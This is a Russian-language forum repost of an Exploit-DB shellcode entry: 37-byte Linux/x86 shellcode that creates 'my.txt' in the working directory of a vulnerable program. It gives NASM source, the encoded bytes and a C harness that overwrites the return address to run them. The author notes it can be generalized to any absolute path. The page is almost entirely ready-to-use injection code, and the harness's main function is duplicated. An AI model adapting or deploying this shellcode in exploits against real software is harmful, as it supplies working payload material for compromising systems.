Exploit Linux/x86 - Create 'my.txt' In Working Directory Shellcode (37 bytes)

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
36701
Проверка EDB
  1. Пройдено
Автор
MOHAMMAD REZA RAMEZANI
Тип уязвимости
SHELLCODE
Платформа
LINUX_X86
CVE
N/A
Дата публикации
2015-04-10
Linux/x86 - Create 'my.txt' In Working Directory Shellcode (37 bytes)
C:
/*
#Title: Create 'my.txt' in present working directory of vulnerable software
#Length: 37 bytes
#Date: 3 April 2015
#Author: Mohammad Reza  Ramezani (mr.ramezani.edu [at] gmail com - g+) 
#Tested On: kali-linux-1.0.6-i386




Section   .text
global _start

_start:
push byte 8
pop eax
jmp short GoToCall
shellcode:
pop ebx
xor edx, edx
mov [ebx + 6], dl
push word 0544o
pop ecx
int 0x80

push byte 1
pop eax
xor ebx, ebx
int 0x80


GoToCall:
call shellcode
db 'my.txtX'


This shellcode can generalized by using of absolute path instead of 'my.txt'
*/

char shellcode[] = "\x6a\x08\x58\xeb\x14\x5b\x31\xd2"
"\x88\x53\x06\x66\x68\x64\x01\x59\xcd\x80\x6a\x01\x58"
"\x31\xdb\xcd\x80\xe8\xe7\xff\xff\xff\x6d\x79\x2e\x74"
"\x78\x74\x58";

int main()
{
	int *ret;
	ret = (int *)&ret + 2;
	(*ret) = (int)shellcode;
}


int main()
{
	int *ret;
	ret = (int *)&ret + 2;
	(*ret) = (int)shellcode;
}
 
Источник
www.exploit-db.com

Похожие темы